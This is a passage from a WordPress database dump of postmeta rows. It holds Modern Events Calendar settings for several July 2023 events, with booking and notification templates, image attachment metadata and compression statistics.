AM'),(187132,268752,'mec_sequence','25'),(187133,268752,'mec_event_gallery','a:0:{}'),(187134,268752,'mec_related_events','a:0:{}'),(187135,268752,'mec_banner','a:0:{}'),(187137,268752,'_dp_original','268685'),(187138,268752,'_edit_lock','1688163175:2'),(187139,268752,'_edit_last','2'),(187151,268753,'mec_additional_organizer_ids','a:0:{}'),(187152,268753,'mec_additional_location_ids','a:0:{}'),(187153,268753,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-07-05\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-07-05\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(187154,268753,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(187155,268753,'mec_certain_weekdays','a:0:{}'),(187156,268753,'mec_allday','0'),(187157,268753,'one_occurrence','0'),(187158,268753,'mec_hide_time','0'),(187159,268753,'mec_hide_end_time','0'),(187160,268753,'mec_comment',''),(187161,268753,'mec_timezone','global'),(187162,268753,'mec_countdown_method','global'),(187163,268753,'mec_public','1'),(187164,268753,'mec_start_date','2023-07-05'),(187165,268753,'mec_start_time_hour','7'),(187166,268753,'mec_start_time_minutes','0'),(187167,268753,'mec_start_time_ampm','PM'),(187168,268753,'mec_start_day_seconds','68400'),(187169,268753,'mec_end_date','2023-07-05'),(187170,268753,'mec_end_time_hour','8'),(187171,268753,'mec_end_time_minutes','0'),(187172,268753,'mec_end_time_ampm','PM'),(187173,268753,'mec_end_day_seconds','72000'),(187174,268753,'mec_repeat_status','0'),(187175,268753,'mec_repeat_type',''),(187176,268753,'mec_repeat_interval','1'),(187177,268753,'mec_repeat_end',''),(187178,268753,'mec_repeat_end_at_occurrences',''),(187179,268753,'mec_repeat_end_at_date',''),(187180,268753,'mec_advanced_days','a:0:{}'),(187181,268753,'mec_in_days',''),(187182,268753,'mec_not_in_days',''),(187183,268753,'mec_hourly_schedules','a:0:{}'),(187184,268753,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(187185,268753,'mec_tickets','a:0:{}'),(187186,268753,'mec_fees_global_inheritance','1'),(187187,268753,'mec_fees','a:0:{}'),(187188,268753,'mec_ticket_variations_global_inheritance','1'),(187189,268753,'mec_ticket_variations','a:0:{}'),(187190,268753,'mec_reg_fields_global_inheritance','1'),(187191,268753,'mec_reg_fields','a:0:{}'),(187192,268753,'mec_bfixed_fields','a:0:{}'),(187193,268753,'mec_op','a:0:{}'),(187194,268753,'mec_fields','a:0:{}'),(187195,268753,'mec_event_status','EventScheduled'),(187196,268753,'mec_moved_online_link',''),(187197,268753,'mec_cancelled_reason',''),(187198,268753,'mec_display_cancellation_reason_in_single_page',''),(187199,268753,'boldgrid_hide_page_title','0'),(187200,268753,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(187201,268753,'passster_activate_global_protection',NULL),(187202,268753,'passster_activate_protection',NULL),(187203,268753,'passster_protection_type','password'),(187217,268753,'_dp_original','266104'),(187205,268753,'boldgrid_in_page_containers','1'),(187206,268753,'passster_area_shortcode',''),(187207,268753,'mec_cost_auto_calculate','0'),(187208,268753,'mec_style_per_event','global'),(187209,268753,'mec_trailer_url',''),(187210,268753,'mec_trailer_title',''),(187211,268753,'mec_start_datetime','2023-07-05 07:00 PM'),(187212,268753,'mec_end_datetime','2023-07-05 08:00 PM'),(187213,268753,'mec_sequence','8'),(187214,268753,'mec_event_gallery','a:0:{}'),(187215,268753,'mec_related_events','a:0:{}'),(187216,268753,'mec_banner','a:0:{}'),(187218,268753,'_edit_lock','1688171362:2'),(187219,268753,'_edit_last','2'),(187220,268753,'_thumbnail_id','268755'),(187221,268755,'_wp_attached_file','2023/06/ancient-ruins-2.jpg'),(187222,268755,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:751;s:6:\"height\";i:422;s:4:\"file\";s:27:\"2023/06/ancient-ruins-2.jpg\";s:8:\"filesize\";i:102170;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"ancient-ruins-2-350x196.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22194;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"ancient-ruins-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8597;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:27:\"ancient-ruins-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28710;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:27:\"ancient-ruins-2-500x422.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:422;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67368;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:27:\"ancient-ruins-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46691;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:27:\"ancient-ruins-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32447;}s:8:\"tileview\";a:5:{s:4:\"file\";s:27:\"ancient-ruins-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34495;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(187223,268755,'original-file','2023/06/ancient-ruins-2-updraft-pre-smush-original.jpg'),(187224,268755,'smush-complete','1'),(187225,268755,'smush-info','The file was compressed from 99.78 KB to 94.80 KB saving 4.99 percent using WP-Optimize'),(187226,268755,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:102170;s:12:\"smushed-size\";i:97076;s:15:\"savings-percent\";d:4.9900000000000002131628207280300557613372802734375;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:102170;s:10:\"compressed\";i:97076;}s:6:\"medium\";a:2:{s:8:\"original\";i:22194;s:10:\"compressed\";i:21683;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8597;s:10:\"compressed\";i:8531;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:28710;s:10:\"compressed\";i:27984;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:67368;s:10:\"compressed\";i:65197;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:46691;s:10:\"compressed\";i:45441;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:32447;s:10:\"compressed\";i:31550;}s:8:\"tileview\";a:2:{s:8:\"original\";i:34495;s:10:\"compressed\";i:33780;}}}'),(187227,268151,'folders_file_replaced','1688179673'),(187228,268151,'_edit_lock','1688179615:2'),(187229,268151,'passster_area_shortcode',''),(187230,247330,'_wp_old_date','2023-03-15'),(187231,247336,'_wp_old_date','2023-03-15'),(187232,265030,'_wp_old_date','2023-03-15'),(187233,264903,'_wp_old_date','2023-03-15'),(187234,264902,'_wp_old_date','2023-03-15'),(187235,264901,'_wp_old_date','2023-03-15'),(187236,247345,'_wp_old_date','2023-03-15'),(187237,267897,'_wp_old_date','2023-03-15'),(187238,247332,'_wp_old_date','2023-03-15'),(187239,266761,'_wp_old_date','2023-03-15'),(187240,266281,'_wp_old_date','2023-03-15'),(187241,247342,'_wp_old_date','2023-03-15'),(187242,261921,'_wp_old_date','2023-03-15'),(187243,247343,'_wp_old_date','2023-03-15'),(187244,247344,'_wp_old_date','2023-03-15'),(193309,269169,'mec_price','0'),(187248,268759,'protect_children',''),(187249,268759,'mec_color',''),(187250,268759,'mec_location_id','187'),(187251,268759,'mec_dont_show_map','0'),(187252,268759,'mec_organizer_id','1'),(187253,268759,'mec_read_more',''),(187254,268759,'mec_more_info',''),(187255,268759,'mec_more_info_title',''),(187256,268759,'mec_more_info_target','_self'),(187257,268759,'mec_cost',''),(187258,268759,'mec_currency','a:0:{}'),(187259,268759,'mec_additional_organizer_ids','a:0:{}'),(187260,268759,'mec_additional_location_ids','a:0:{}'),(187261,268759,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-07-12\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-07-12\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(187262,268759,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(187263,268759,'mec_certain_weekdays','a:0:{}'),(187264,268759,'mec_allday','0'),(187265,268759,'one_occurrence','0'),(187266,268759,'mec_hide_time','0'),(187267,268759,'mec_hide_end_time','0'),(187268,268759,'mec_comment',''),(187269,268759,'mec_timezone','global'),(187270,268759,'mec_countdown_method','global'),(187271,268759,'mec_public','1'),(187272,268759,'mec_start_date','2023-07-12'),(187273,268759,'mec_start_time_hour','6'),(187274,268759,'mec_start_time_minutes','30'),(187275,268759,'mec_start_time_ampm','PM'),(187276,268759,'mec_start_day_seconds','66600'),(187277,268759,'mec_end_date','2023-07-12'),(187278,268759,'mec_end_time_hour','7'),(187279,268759,'mec_end_time_minutes','30'),(187280,268759,'mec_end_time_ampm','PM'),(187281,268759,'mec_end_day_seconds','70200'),(187282,268759,'mec_repeat_status','0'),(187283,268759,'mec_repeat_type',''),(187284,268759,'mec_repeat_interval','1'),(187285,268759,'mec_repeat_end',''),(187286,268759,'mec_repeat_end_at_occurrences',''),(187287,268759,'mec_repeat_end_at_date',''),(187288,268759,'mec_advanced_days','a:0:{}'),(187289,268759,'mec_in_days',''),(187290,268759,'mec_not_in_days',''),(187291,268759,'mec_hourly_schedules','a:0:{}'),(187292,268759,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(187293,268759,'mec_tickets','a:0:{}'),(187294,268759,'mec_fees_global_inheritance','1'),(187295,268759,'mec_fees','a:0:{}'),(187296,268759,'mec_ticket_variations_global_inheritance','1'),(187297,268759,'mec_ticket_variations','a:0:{}'),(187298,268759,'mec_reg_fields_global_inheritance','1'),(187299,268759,'mec_reg_fields','a:0:{}'),(187300,268759,'mec_bfixed_fields','a:0:{}'),(187301,268759,'mec_op','a:0:{}'),(187302,268759,'mec_fields','a:0:{}'),(187303,268759,'mec_event_status','EventScheduled'),(187304,268759,'mec_moved_online_link',''),(187305,268759,'mec_cancelled_reason',''),(187306,268759,'mec_display_cancellation_reason_in_single_page',''),(187307,268759,'boldgrid_hide_page_title','0'),(187308,268759,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(187309,268759,'passster_activate_global_protection',NULL),(187310,268759,'passster_activate_protection',NULL),(187311,268759,'passster_protection_type','password'),(187312,268759,'boldgrid_in_page_containers','1'),(187326,268759,'_dp_original','267696'),(187314,268759,'passster_area_shortcode',''),(187315,268759,'_wp_old_date','2023-01-14'),(187316,268759,'mec_cost_auto_calculate','0'),(187317,268759,'mec_style_per_event','global'),(187318,268759,'mec_trailer_url',''),(187319,268759,'mec_trailer_title',''),(187320,268759,'mec_start_datetime','2023-07-12 06:30 PM'),(187321,268759,'mec_end_datetime','2023-07-12 07:30 PM'),(187322,268759,'mec_sequence','1'),(187323,268759,'mec_event_gallery','a:0:{}'),(187324,268759,'mec_related_events','a:0:{}'),(187325,268759,'mec_banner','a:0:{}'),(187327,268759,'_edit_lock','1688228910:15'),(187328,268759,'_edit_last','15'),(187329,268760,'_wp_attached_file','2023/07/Dreams.webp'),(187330,268760,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:19:\"2023/07/Dreams.webp\";s:8:\"filesize\";i:18150;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"Dreams-350x196.webp\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11444;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"Dreams-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8930;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:19:\"Dreams-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11240;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:19:\"Dreams-500x380.webp\";s:5:\"width\";i:500;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15144;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:19:\"Dreams-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13730;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:19:\"Dreams-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12316;}s:8:\"tileview\";a:5:{s:4:\"file\";s:19:\"Dreams-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11648;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(187331,268759,'_thumbnail_id','268760'),(187332,268762,'protect_children',''),(187333,268762,'mec_color',''),(187334,268762,'mec_location_id','171'),(187335,268762,'mec_dont_show_map','0'),(187336,268762,'mec_organizer_id','1'),(187337,268762,'mec_start_date','2023-07-20'),(187338,268762,'mec_start_time_hour','7'),(187339,268762,'mec_start_time_minutes','0'),(187340,268762,'mec_start_time_ampm','PM'),(187341,268762,'mec_start_day_seconds','68400'),(187342,268762,'mec_end_date','2023-07-20'),(187343,268762,'mec_end_time_hour','8'),(187344,268762,'mec_end_time_minutes','0'),(187345,268762,'mec_end_time_ampm','PM'),(187346,268762,'mec_end_day_seconds','72000'),(187347,268762,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-07-20\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-07-20\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(187348,268762,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(187349,268762,'mec_certain_weekdays','a:0:{}'),(187350,268762,'mec_allday','0'),(187351,268762,'mec_hide_time','0'),(187352,268762,'mec_hide_end_time','0'),(187353,268762,'mec_comment',''),(187354,268762,'mec_repeat_status','0'),(187355,268762,'mec_repeat_type',''),(187356,268762,'mec_repeat_interval','1'),(187357,268762,'mec_repeat_end',''),(187358,268762,'mec_repeat_end_at_occurrences',''),(187359,268762,'mec_repeat_end_at_date',''),(187360,268762,'mec_advanced_days','a:0:{}'),(187361,268762,'mec_in_days',''),(187362,268762,'mec_not_in_days',''),(187363,268762,'mec_hourly_schedules','a:0:{}'),(187364,268762,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(187365,268762,'mec_tickets','a:0:{}'),(187366,268762,'mec_fees_global_inheritance','1'),(187367,268762,'mec_fees','a:0:{}'),(187368,268762,'mec_ticket_variations_global_inheritance','1'),(187369,268762,'mec_ticket_variations','a:0:{}'),(187370,268762,'mec_reg_fields_global_inheritance','1'),(187371,268762,'mec_reg_fields','a:0:{}'),(187372,268762,'mec_op','a:0:{}'),(187373,268762,'mec_event_date_submit','20210422105713'),(187374,268762,'mec_read_more',''),(187375,268762,'mec_more_info',''),(187376,268762,'mec_more_info_title',''),(187377,268762,'mec_more_info_target','_self'),(187378,268762,'mec_cost',''),(187379,268762,'mec_currency','a:0:{}'),(187380,268762,'mec_additional_organizer_ids','a:0:{}'),(187381,268762,'mec_additional_location_ids','a:0:{}'),(187382,268762,'one_occurrence','0'),(187383,268762,'mec_timezone','global'),(187384,268762,'mec_countdown_method','global'),(187385,268762,'mec_public','1'),(187386,268762,'mec_bfixed_fields','a:0:{}'),(187387,268762,'mec_fields','a:0:{}'),(187388,268762,'mec_event_status','EventScheduled'),(187389,268762,'mec_moved_online_link',''),(187390,268762,'mec_cancelled_reason',''),(187391,268762,'mec_display_cancellation_reason_in_single_page',''),(187392,268762,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(187393,268762,'passster_activate_global_protection',NULL),(187394,268762,'passster_activate_protection',NULL),(187395,268762,'passster_protection_type','password'),(187396,268762,'_wp_old_date','2022-01-18'),(187397,268762,'boldgrid_in_page_containers','1'),(187411,268762,'_dp_original','266827'),(187399,268762,'_oembed_feb482e9f1973a04e96ed04d346ebf98','{{unknown}}'),(187400,268762,'passster_area_shortcode',''),(187401,268762,'mec_cost_auto_calculate','0'),(187402,268762,'mec_style_per_event','global'),(187403,268762,'mec_trailer_url',''),(187404,268762,'mec_trailer_title',''),(187405,268762,'mec_start_datetime','2023-07-20 07:00 PM'),(187406,268762,'mec_end_datetime','2023-07-20 08:00 PM'),(187407,268762,'mec_sequence','1'),(187408,268762,'mec_event_gallery','a:0:{}'),(187409,268762,'mec_related_events','a:0:{}'),(187410,268762,'mec_banner','a:0:{}'),(187412,268762,'_edit_lock','1688228743:15'),(187413,268762,'_edit_last','15'),(187414,268762,'_thumbnail_id','266818'),(187415,268765,'protect_children',''),(187416,268765,'mec_color',''),(187417,268765,'mec_location_id','165'),(187418,268765,'mec_dont_show_map','0'),(187419,268765,'mec_organizer_id','1'),(187420,268765,'mec_read_more',''),(187421,268765,'mec_more_info',''),(187422,268765,'mec_more_info_title',''),(187423,268765,'mec_more_info_target','_self'),(187424,268765,'mec_cost',''),(187425,268765,'mec_currency','a:0:{}'),(187426,268765,'mec_additional_organizer_ids','a:0:{}'),(187427,268765,'mec_additional_location_ids','a:0:{}'),(187428,268765,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-07-11\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-07-11\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(187429,268765,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(187430,268765,'mec_certain_weekdays','a:0:{}'),(187431,268765,'mec_allday','0'),(187432,268765,'one_occurrence','0'),(187433,268765,'mec_hide_time','0'),(187434,268765,'mec_hide_end_time','0'),(187435,268765,'mec_comment',''),(187436,268765,'mec_timezone','global'),(187437,268765,'mec_countdown_method','global'),(187438,268765,'mec_public','1'),(187439,268765,'mec_start_date','2023-07-11'),(187440,268765,'mec_start_time_hour','7'),(187441,268765,'mec_start_time_minutes','0'),(187442,268765,'mec_start_time_ampm','PM'),(187443,268765,'mec_start_day_seconds','68400'),(187444,268765,'mec_end_date','2023-07-11'),(187445,268765,'mec_end_time_hour','8'),(187446,268765,'mec_end_time_minutes','0'),(187447,268765,'mec_end_time_ampm','PM'),(187448,268765,'mec_end_day_seconds','72000'),(187449,268765,'mec_repeat_status','0'),(187450,268765,'mec_repeat_type',''),(187451,268765,'mec_repeat_interval','1'),(187452,268765,'mec_repeat_end',''),(187453,268765,'mec_repeat_end_at_occurrences',''),(187454,268765,'mec_repeat_end_at_date',''),(187455,268765,'mec_advanced_days','a:0:{}'),(187456,268765,'mec_in_days',''),(187457,268765,'mec_not_in_days',''),(187458,268765,'mec_hourly_schedule